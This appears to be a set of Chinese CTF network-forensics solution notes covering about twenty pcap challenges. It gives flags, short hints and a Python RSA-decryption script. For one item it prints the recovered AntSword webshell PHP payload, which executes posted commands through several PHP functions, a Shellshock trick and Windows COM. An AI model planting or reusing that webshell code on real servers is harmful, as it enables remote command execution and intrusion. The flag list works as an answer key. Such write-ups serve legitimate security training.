21.root
root.pcapng
flag:when_solving_problems_dig_at_the_roots_instead_of_just_hacking_at_the_leaves
22.说我作弊需要证据
cheat.pcapng
题目来源: ISCC-2017
题目描述:X老师怀疑一些调皮的学生在一次自动化计算机测试中作弊,他使用抓包工具捕获到了Alice和Bob的通信流量。狡猾的Alice和Bob同学好像使用某些加密方式隐藏通信内容,使得X老师无法破解它,也许你有办法帮助X老师。X老师知道Alice的RSA密钥为(n, e) = (0x53a121a11e36d7a84dde3f5d73cf, 0x10001) (192.168.0.13)?,Bob的RSA密钥为(n, e) =(0x99122e61dc7bede74711185598c7, 0x10001) (192.168.0.37)
import base64
from libnum import *
c_lits=[……]
#192.168.0.13
n1=1696206139052948924304948333474767
e1=65537
#p1=38456719616722997
#q1=44106885765559411
d1=37191940763524230367308693117833
#192.168.0.37
n2=3104649130901425335933838103517383
e2=65537
#p2=49662237675630289
#q2=62515288803124247
d2=1427000713644866747260499795119265
flag_1 = b""
flag_2 = b""
for i in c_lits:
tmp = base64.b64decode(i)
tmp = tmp.decode()
tmp = tmp.split("L; SIG = ")
#SIG = 后面是明文数据
m = int(tmp[1].replace("L;",""),16)
#DATA = 后面是RSA加密数据
c = int(tmp[0].split("DATA = ")[1],16)
#第一种可能
m_ = pow(m, e1, n1)
#print(m_)
c_ = pow(c,d2,n2)
#print(c_)
if m_ == c_:
flag_1 = flag_1 + n2s(m_)
print("第一种",m_)
#第二种可能
m_ = pow(m, e2, n2)
#print(m_)
c_ = pow(c,d1,n1)
#print(c_)
if m_ == c_:
flag_2 = flag_2 + n2s(m_)
print("第二种",m_)
print(flag_1)
print(flag_2)
t3_01ftmg_n}h3hl3_n530rn0{g3a0_v_
修复顺序:flag{n0th1ng_t0_533_h3r3_m0v3_0n}
23.traffic
http.pcapng
第一个flag
flag{fakeflag2333333333333}
第二个flag
flag{zhehaishiyigejiade_flag}
第三个flag
flag{ne7WORK_traffIc_i5_int3r3sing_1433223}
24.AWDshell中国蚁剑rsa aes流量
AWDshell.pcapng
import rsa
import base64
from LazyMyRSA import *
Pub_Key='MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCmXoXBvXeanxgl51HBm2J6HPNhTQtfb8ICioE+n0Ni0DlBFHSBprbsWYKJywVfdhJbLDCCon68uA1UYuy0yteDog3jOdweW2bscEGmeMXLQJfBHpQrg4wWoYJjD3QsKorYT6kdp1LRkuHE3PbpqvRtqO7ALzrcBi88Eu7oZaPANwIDAQAB'
c = "GmFJzJHcsMOZxeGvb3Ulf4Y8e5RRhttAV1bsfypbvQAJW8IRFcqDVoXtyiclZwz2qXdQN8ivFYNqNxhkwtjbB7OitVLgULBfWlOnwtufxvmbmO4u8WlINbPbf/DbAy0Qx3GjBMFpFzrCkKINOfWQ5JqSD1EPx6sM9Cu1VkX5nus=|nL6Ds9dWn+UW5Jb0JAhoTb4rqPJJKbgcPNJfXLP1AKPbWHVE0JFSjClsnXWmFPXfeqPdKqcYxb/14hEwFzs51N5f6+NowrGHjYT+ObPKXpYxzg0vkCMihUMA7DI2YPUWEyPdvoIFg/bW5S3MommwKN9epOto55dtq6Pnb8NEHzY=|S4ic8EaKa3zEkRd7qsTGDs7uf3qiU1UVZE4fheQz3iq1HkiY6rIvAdtvcmsBF5aJWjdA/U2py1Mz105F2Tzm4dDX2Ag/rhX4ysiP8NJDEp+I55R0dfJu6szTOr3O2OTaUQK7iSYT4PKHjdo+rgeHK3hWzzMFAs6i2R9E81vz9WE=|FNCwxF7bDPNgizk4oa7bq4xbIObNCZNYNBdrTLMbYegWZ6FVYi54TLuABR/nkDLXq38cT099hjajM4iY+VL4g8tBRP++4LyPcSyzyC6mDtshAlmQtFteq4sGb+3IilDPekURxQ5RodRGBPtHr+nCNICbgmbqNaYKcVJRfMoK3q8=|m+nGWL1bOFJzaYeT54FtW12U3dWPZk5PJa91+YTtLn9Wg1c8JEf0FzI+YlBtpp6pW0fT7FfbTiJhQsv3f97bb3d+Cs7A5dM/ZG5YXDoDHGhRJKw0+TTHRIm3PH4fnbQNI8zhi5+9t2+0ueujAuXkk8i73A4lH36uKJFloL6yqs8=|YsyuPkbRlpDWwjhlkTThQN9GQXGkkzyNSFoxs5IfsRbbO7ZHphlFhL4yYsRYAgp8MkMJ64x7NfIGoVgDJnA1YgORiJOf8GP/p/28MLOuscy1SVN/lLnJzbhmf/7vfg0/Q94QAEWk2TOgSil0h3JDsgQYqDtFFldHWDnqEvYlWZI=|C2ZaL3MQWCQBmNcq8xAxxlhvXzUxo0qBz2PUIqBIMcKNJ3sgxU+RTqSwYoqPTDAg3//7rNa+dkinRAidD8GjrcSBd5qdbTLQlWZGME9Lv6JEFt0udTU0FVrhV/ctPz+z1NN5P4pN1tj35sNKsyfYH1kq13A+3dYk0wZlMU9KIFI=|l65yWzb3A97Cdu0wdn59Hiag/Um4/LZTrolCjwo9d7/J3Z9stTkaEtLe2XBdVQZsipUfnW2o7JWgQNo0TUbGWIv2H5wKGaTfPm7OTSkm+ao48Nn1d/+yME+RLudQqbmYREMAJFviNJST+H4Q+MqyngjMeGrb5jmlw0eQZ/MUx5Q=|EYwu5Y3rgl8k2KrPZjnGPWjriLI1mDeJwA4KhjvJ4wQs9Xx+ITDsxBr0eMfL/Km95ykbfMlZcrSzonx5hLiE2YLwDjX/cIIZxqzZXkEYq00AdAPrFnhFVdvJn/SHQ1LdGHgAN88Y2EOZOPM8ZXima61BxCY44TlrezIbBj4+eQ0=|Z2/dEUju0jw63PMHCK9CAG+tHmwiH0t3GraGPCes4TZT5hIfv6kHMTOgMthTK6sd5qy+EVw6d1Qxh03WMHVH0gR2aYqEl1RdYwQpN0NPsSM+fETsag3nQ4oV3VniGlaMmdFIiYatNvKNl7tOcapklyxEEIA0Jc33O7FDjUXKiHU=|YEVG5OctKJXP1Z7kywDJGrmb7BvXW/C3iQudtTCLgUIbMhXFq90wLvW7No7ZoqhY/Mh1XlJKtkBZJWEbsORW23hxvA5LCb/edsfJmIxWtj5cRG9g66j3BiEUPDjvtYi6beUjUtKmuSInELTkmIKf1jo5qyZE+VcWC4HfAT0wbFw=|ii/O42J/+ko4xPNfNuunKR7gyji/wtaiMcKMzQM2Qg7KZE/+xAcLX3Znh55OwgsfaTX6AedF+L/1hwMp9zigbvXorSE0TNay//nVlcnhhC4snAu2/hjXNoI3OnnWlfFFLYOj5v+1LN1nCU/UzoHV6/w1/4bVz7Maovj14BfXklI=|eay1qqOy5QmJmStB9EH4JKPms1In5agVigegn5/1IZS+0QpBgK37mWg02rspbMz20brtSgsv2PhJ3gMTFg3ib7z0cQZPvcNV6DTZwSHbUO2M1uQetssYMMnBPPulwLhTkND4SzwSsgDLS6m8TxbHL0qpZRcnNo2sMy478S5DkvM=|e4qLRtta2W6ItXy3HNgpYuQuSSzpsvq+SUfoRKWM8Z5QdiBeleS/YDGP0VZqRJh3CPMC6vbegwB7qNLAt6czTsHQTdTAJBLr5g4oTDc9Sxlk8A7vvK0ljLSgKjNw5s3BDa03jINPkc5BbDkrTaXMq01Bqcu5DPTTA0pO/Z9oq1Q=|RBdZrEGknOK+PCuQ1F2eTxKvAi50XD/Z1ccAItPJ+48VlSbOTZa/wkdr82K8LE56z0E4JtZDBVSj9I4TurU2bbmfCjKXGw9xlagS7YMr/hfyCy/2hrVveAkaBZDAtmnrM4nGpFxVpzArl124XlqEzh9cSS9LAnwkNm8j05D6mDc=|aZpV5K4m1Rwxd/Y9eOfJ0bRpIZybj2tSjuAEJI7Il/EV9ZC0pXLIkgWviG40pXQFGoEwGex7f0j/Je4ldLRKnrpsyZ+/3mZtHnHL4gepf+iVaULQ8jdHTVVnM1t4qLJk+RnhYbuFjcUy5Yo6rn0Cju8sPIdpEwvi8fvetIOGVJE=|fPGROe6VaAwzqmNuk86fnWT4LqandXTwuewTC80zI8xTFSj1S6YMxPROTHS94gXlCcLTfFjEW2VpH2tyANX1FBIw5sSjsuS6CQKuqiQo6ID975H5Ox+KkJs6XLP/l5Or34U3rryHzBooTrXQlDl21qoPBLdj5URgGrEq7wrvLVA=|jp3lUm3Gz2eZpB5zghEGom2syK8nBymkc6h3pKE/mIS8KW6gD2OFSEneFERI0jy26kVOBhxr3ZHY3WoL6s5aJepTuY7D6Dpz/REI+FzR2PlCo0WvyLQdOphMgbYef1SyYr1+DWK/JxxFjxtfVRZlwL7+OyHQjQ05oVHyq6juSEI=|h8tsCCKgjChZ5U/sZxeVPiF8hO+cB6qqfeWnTAMydEcLmR0iwvHcarZw4g2WH2ASvwIN0av4GzLSu2QtOM1u0y/OuVX3v9/Vp+nNMZ/Dog0NUxFIPD1HTgaK3w7DdnA6B6i26JooWAxKlTFgYmr0x7K53pmM6B8wVQu/ADsbFBE=|CdejrTSVZhSgL+3bhPQyuL7ho71i+L8VvpwNg+D84YnKdwbbbfgqIMu+gefCBmyzvhbhEeGR16/T/fZ4bkneak+fzZpgUrejrFbOETG2Rg9zViznPwBdku9FTlWUybaRD0CHKeY7nE93/G2yXWSpuk/7P594cAPi1qd2WnEbaBc=|Hnxjy7ZSfmn6B59Kv7VXu1mhtYdgGbOtsLsLqDX6K1dKhtHsGx0guy03qwqRA0XElDdJ3Dvgqi5lgb8SY6MiDf1c9u870K8S9xVTn6Y0lbZgtvPoDrobEiT6tGEQCRsUuXB6jbUTgnNPmaDAuidQZqdsSBIGZwQyzycgxHmaDuE=|Imz1om4RRCU1Wnyowe5SYFtICyD1BODveyZ497yURKcyMgoogUxi0cPCiyexdD9ciNYk6DGyimegT7zMeIA5oGfNg2EHbzuBJeSc4wqLCJtSmTe66inu3dqC4IDxt2ghkgFLSQZWqNOKOgUt1b5wgy3O/Y3iIzS888TuFSDm+RQ=|jldlrb8EHvWiKi5E/HBIrn4UUnzMZO8+6ugZ7hjZTtWI5Vg9EeWdmITpEpOQIWIXpOUhaI+VydVcom8e7Fe6gR6u4RPy5ChmFgjZhT03gwwNXzJeiaE6x7ZZjXGBZA3Lwu5gRns3s+hTM0Tm2vrhGOQDB41hDDi4N/Yb3MRn0PM=|UJKgd4FCzzzMeQEq+w3S17+3d+g9mM3JM2qZWkWHOIF3L/EiWpRhm18DuaWJ7veqQSA5pb3KGH9rKDvj2KHIDTUHl0gCiH1U5qeD+WqXFvLahN5O8ecrfgflUUip1SdE6aL6dYqzyplxF+qy3BVr2dKq+6UYlUiA5Bmn2lXSIyM=|LClEAJBfCO7HMhlu0ASDbetkR7sP4aOx9a/P4P0L5kLeGYrlrK4Qg3ZNl7Fd/gQ8KXAKs90XRE62pfZidMX1A4xj/IokC6nkXCNUIzi0PWPWdCzcBNiswbQtsTZhElecl8RyfaOSvxsiKclTvKbZYfQI5r0p0asBs5gKnK0FpT4=|paMu+DWwNp+5GRSiGn4QfFaS/ffXXKuBgP/qzsixnnBWMeXIVy/HT23Xdoc7/OdlIH8/rBKdrJt+7o6XUAbRGzND9sEuf0Ldh5npWln/EhSkGq+bqt1hDfmwwsoo2GJcNDHBhz6lQq2M4zoa9E9d04T3N/SE+3B7LFb0cxLE8aA=|Cz+hQca9uYZJPPJusvE1G8X12VF5iPFM83nOnszF38XQziVKd+D83N4IvoJPNdJLEtgbycIpg1bo5auK1u9n2Pv8z1jFHoaTzmPgDBFiAAv3NGd0m2vg09QwRxq84PD9Ey0dwT7C1w2e6M9wGJ6DoIhPhZQgvUKMyrmCAVmMo18=|h59BqEgdFq4a1HegvdVKeMWwiwQMQsaSzYOxbNCiPuCRGknF8dHHkQboB65gnjbNBDPVpiVoDBMDV+1sCc1yM8zqC494bDS7iopf/U3BBnZS2wCxeo1x78DUiEgzP6ILomxrhrMY2y5R9IbmhJQVkpiqMhPaCvvHzOZO6Pz9SHg=|gUSFO4uVnPAI4UVTKCdBqH/rD6BZZFPfhsVOzga0ohjOJhXW+pvAu4GSh+3FIGn6cpxBUILbsLjBSgmscqAbKV/nHRnQ8HjQUgnu5YM8KikKJV35OMt1Mo1P/qlF5bwzI969XDtUHtClPkznXuO4HyvGLj0/mJj0IauhxfDKhyU=|jkhijGHqR86l+YGh7fldHrzLfam9LUYfRt2nrqqgeqCoE6KO8khatGkzLPk8QgIjLti6P6d7AwwPdVLX3gsfv6bBhT26qUR1u5+AA8foNt5tH6Ej33OODcnkxcp19eFu+zWRG1zUDkBs5qtCJvZKnpSPFKxJ6Z2g0RAoKF3pqbY=|QayQ2dVrEz8KBgpVQjGRNbpRHgFhVK3e89fEzEKzlclezrZ7CBgjB6/Y0PPYSIeZldFEZficAzHXs+bFHALEMrkJlRMk36FMuqtn0YVs4cVy8AHxjb8QnJD9gsFC6q2EWmRo8w4ZdBvg1xyeg3D0vhOcZgNk78BGoSU2HhHK5xY=|Ncgk0CAlnik6xDFINohB1EqgT7tS8COpia8O9cuvi53lNlQWY4IWG2oZMgzNWeU/m8QL+EGqhrD6IflJDD/hDO/IFC6D2DEjeMofqJ/6sHXAt2lIV129SeUUjGdrxyxeWDtqu6iBDdDBtyfPVfeI/DMYOh46XkR0Wk5nBU2N7+U=|lOxi5A2Z8sa8+aw5rQm0g6gqukXMlwvLV7ykEiGWFRqFqDaRPnkVI8diKsvgBg0Btk94gXt2FX1polSNgIJL3E6GW9loo2OMSGBBg1KJ/6VC/DpLWy44VbZhrUB//hiXo3xua6h2DRDi4h5eFkkf2ZIjGjZBi+AqHQINUbetN54=|DRBn6EF3Eoj+wpOX2xhKhkrypPB+d2+8PyHzXwKL8QmOeaRufeCZ1/7Id4TQPXiRXOYsPDXVLr1tUWAUNfqIQisGxSL8lAgg9LzYNYxRUejuTsP2WmVSO21cYXTPlNYjJDR+BkTtOlAvBBp3fjwhOVlr1khuzAhl2Y799drdSFk=|VIJ6dfEfxNcc1eWhAL0dMWXkGSCnBqv+I+Hqs7mGdK9CG3sMH1LyhIEsYg/UPccftYAPeIqKitOpj4OlNbGQMlf8AIJgFvNceAl7HCwqf/6ggZzfcBx5r4HpCBI3cB2zOOOlX9AFVRcunk3rCZSsaeQ8QGsLC1q/2EImzQqSB5g="
c = c.split("|")
for encrypt_text in c:
#公钥解密
result = PubKey_Decrypt(encrypt_text).decrypt()
print(result)
@ini_set("display_errors", "0");@set_time_limit(0);function asenc($out){@sessio n_start();$key=@substr(str_pad(session_id(),16,'a'),0,16);return @base64_encode (openssl_encrypt(base64_encode($out), 'AES-128-ECB', $key, OPENSSL_RAW_DATA));} ;;function asoutput(){$output=ob_get_contents();ob_end_clean();echo "f3c7239848e0";echo @asenc($output);echo "05fda2646c";}ob_start();try{$p=base64_decode($_P OST["t185a78b977a47"]);$s=base64_decode($_POST["wd0b7c7ca226cb"]);$envstr=@base 64_decode($_POST["b8dcb72ce2ba93"]);$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c= substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";if(substr($d,0,1)=="/"){@putenv ("PATH=".getenv("PATH").":/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sb in:/bin");}else{@putenv("PATH=".getenv("PATH").";C:/Windows/system32;C:/Windows /SysWOW64;C:/Windows;C:/Windows/System32/WindowsPowerShell/v1.0/;");}if(!empty( $envstr)){$envarr=explode("|||asline|||", $envstr);foreach($envarr as $v) {if ( !empty($v)) {@putenv(str_replace("|||askey|||", "=", $v));}}}$r="{$p} {$c}";fun ction fe($f){$d=explode(",",@ini_get("disable_functions"));if(empty($d)){$d=arr ay();}else{$d=array_map('trim',array_map('strtolower',$d));}return(function_exi sts($f)&&is_callable($f)&&!in_array($f,$d));};function runshellshock($d, $c) {i f (substr($d, 0, 1) == "/" && fe('putenv') && (fe('error_log') || fe('mail'))) {if (strstr(readlink("/bin/sh"), "bash") != FALSE) {$tmp = tempnam(sys_get_temp _dir(), 'as');putenv("PHP_LOL=() { x; }; $c >$tmp 2>&1");if (fe('error_log')) { error_log("a", 1);} else {mail("a@127.0.0.1", "", "", "-bv");}} else {return Fa lse;}$output = @file_get_contents($tmp);@unlink($tmp);if ($output != "") {print ($output);return True;}}return False;};function runcmd($c){$ret=0;$d=dirname($_ SERVER["SCRIPT_FILENAME"]);if(fe('system')){@system($c,$ret);}elseif(fe('passth ru')){@passthru($c,$ret);}elseif(fe('shell_exec')){print(@shell_exec($c));}else if(fe('exec')){@exec($c,$o,$ret);print(join(" ",$o));}elseif(fe('popen')){$fp=@ popen($c,'r');while(!@feof($fp)){print(@fgets($fp,2048));}@pclose($fp);}elseif( fe('proc_open')){$p = @proc_open($c, array(1 => array('pipe', 'w'), 2 => array( 'pipe', 'w')), $io);while(!@feof($io[1])){print(@fgets($io[1],2048));}while(!@f eof($io[2])){print(@fgets($io[2],2048));}@fclose($io[1]);@fclose($io[2]);@proc_ close($p);}elseif(fe('antsystem')){@antsystem($c);}elseif(runshellshock($d, $c) ) {return $ret;}elseif(substr($d,0,1)!="/" && @class_exists("COM")){$w=new COM( 'WScript.shell');$e=$w->exec($c);$so=$e->StdOut();$ret.=$so->ReadAll();$se=$e-> StdErr();$ret.=$se->ReadAll();print($ret);}else{$ret = 127;}return $ret;};$ret= @runcmd($r." 2>&1");print ($ret!=0)?"ret={$ret}":"";;}catch(Exception $e){echo "ERROR://".$e->getMessage();};asoutput();die();
flag{62a8bd78d8fb5a04dab1579b484d9a88}
25.all
all.pcap
修复头部
26.upload
upload.pcapng
flag{te11_me_y0u_like_it}
27.telnet协议+aes加密
++__++.pcap
WDCTF{Seclab_CTF_2017}
28.hack
hack(5个flag).pcapng
HTTP流92
flag{d41d8cd98f00b204e9800998ecf8427e}
TCP流103
flag{bb9c019d6524e913fd72441d58b68216}
TCP流105
flag{c43064699caf6109f4b3da0405c06ebb}
TCP流111
flag{f0b6f6352bf886623adc04183120f83b}
29.backdoor++
backdoor++.pcap
flag{Icmp_backdoor_can_transfer-some_infomation}
30.brust
brust.pcapng
swings666
31.findwebshell
findwebshell.pcapng
访问http://cff2016.oss-cn-shanghai.aliyuncs.com/AbTzA2YteFjGhPWCftraouVD3B684a9A.jpg,出现一个二维码,扫进去得到flag。
32.flows
flows.pcap
存在两个文件,导出
0000000000000000替换掉,0100000000000000替换成0,02000000000000替换成1
flag{u5b_keybo4rd_m0use}
33.guess
guess.pcapng
NCTF{dbb2ef54afc2877ed9973780606a3c8b}
34.hack
hack.pcap
flag{skysql_is_very_cool!233}
35.kill
kill.pcapng
flag{roses_r_blue_violets_r_r3d_mayb3_harambae_is_not_kill}
36.learn_100
要想会,先学会.pcapng
第三届“百越杯”福建省高校网络空间安全大赛
flag{Na1v3}
37.misc
misc.pcapng
flag{Rgb_dhskjadyhjksndjsagh}
38.packages
packages.pcapng
Flag{900b217f94b0cec1f0ee6687914aadda}
39.secret_200
password.pcapng
I春秋“迎圣诞,拿大奖”活动赛题
flag{C0nGr4t5_H4ck3r_Y0u_Ge7_Secr3t:)}
40.shell
shell.pcap
flag{U_f1nd_Me!}